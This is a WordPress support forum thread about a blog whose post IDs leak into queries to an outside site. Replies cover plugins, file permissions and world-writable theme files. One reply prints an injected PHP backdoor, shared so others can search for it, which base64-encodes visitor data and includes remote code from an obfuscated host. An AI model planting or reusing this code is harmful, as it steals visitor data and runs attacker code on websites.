Support » Fixing WordPress » WordPress Spam?

  • This is an odd one. Whenever I click on an “edit post” link or sometimes even pull up other posts on my blog, I get the post_id passed into a search query to the site:

    Now, I’ve checked thoroughly, and I know it’s not client spyware, because (1) it happens on none of my other wordpress sites on the same computer and (2) it’s happening on several clients.

    Any thoughts? Thanks in advance.

Viewing 7 replies - 1 through 7 (of 7 total)
  • TechGnome



    What plugins do you have activated on it? And are there any activated on this blog that are not on the others? And lastly, what theme are you using?


    I’m running Squible.

    Plugins: Integrator
    Search Hilite
    KG Archives
    Live Comment Preview
    PHP Exec
    Customizable Post Listings
    Limit Posts
    Search Pages

    Mark (podz)


    Support Maven

    Check ALL your theme files.
    Check date last modified, download them, search for those terms. Make sure that those files have permissions no greater than 644

    If it’s being seen in several places then the cause is the common place they share – the server.




    Search PAge — I’d look into seeing what that plugin does exactly….


    Can anyone else help on this? I even replaced WordPress files, and I just don’t know what’s going on.

    Hi, found this via search engine. I am looking for people with the problem.

    It messed up my wiki and totaly shut down my mambo portal, by changing and adding dozends of files. I was able to repair the wiki, but the portal was beond repair.

    Look for this code :

    error_reporting(0);$a=(isset($_SERVER[“HTTP_HOST”]) ? $_SERVER[“HTTP_HOST”] : $HTTP_HOST); $b=(isset($_SERVER[“SERVER_NAME”]) ? $_SERVER[“SERVER_NAME”] : $SERVER_NAME); $c=(isset($_SERVER[“REQUEST_URI”]) ? $_SERVER[“REQUEST_URI”] : $REQUEST_URI); $g=(isset($_SERVER[“HTTP_USER_AGENT”]) ? $_SERVER[“HTTP_USER_AGENT”] : $HTTP_USER_AGENT); $h=(isset($_SERVER[“REMOTE_ADDR”]) ? $_SERVER[“REMOTE_ADDR”] : $REMOTE_ADDR); $n=(isset($_SERVER[“HTTP_REFERER”]) ? $_SERVER[“HTTP_REFERER”] : $HTTP_REFERER); $str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($g).”.”.base64_encode($h).”.”.base64_encode($n);if((include_once(base64_decode(“aHR0cDovLw==”).base64_decode(“dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str))){} else {include_once(base64_decode(“aHR0cDovLw==”).base64_decode(“dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str);}?> is owned by a customer of a customer of a customer of AboveNet Communications. They are investigating. You might want to write them at or drop me a mail and I can include your complaint.


    I ran into this in my themes with WordPress (1.5.2). Running a grep thru my entire web directory I discovered that the custom themes for my blogs were both set to 777 for all the .php pages.

    I’ve setup two blogs and they both had the same issue. I don’t remember setting up the custom themes but I may have. If they are part of the inital WordPress install, this should probalby be addressed.

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘WordPress Spam?’ is closed to new replies.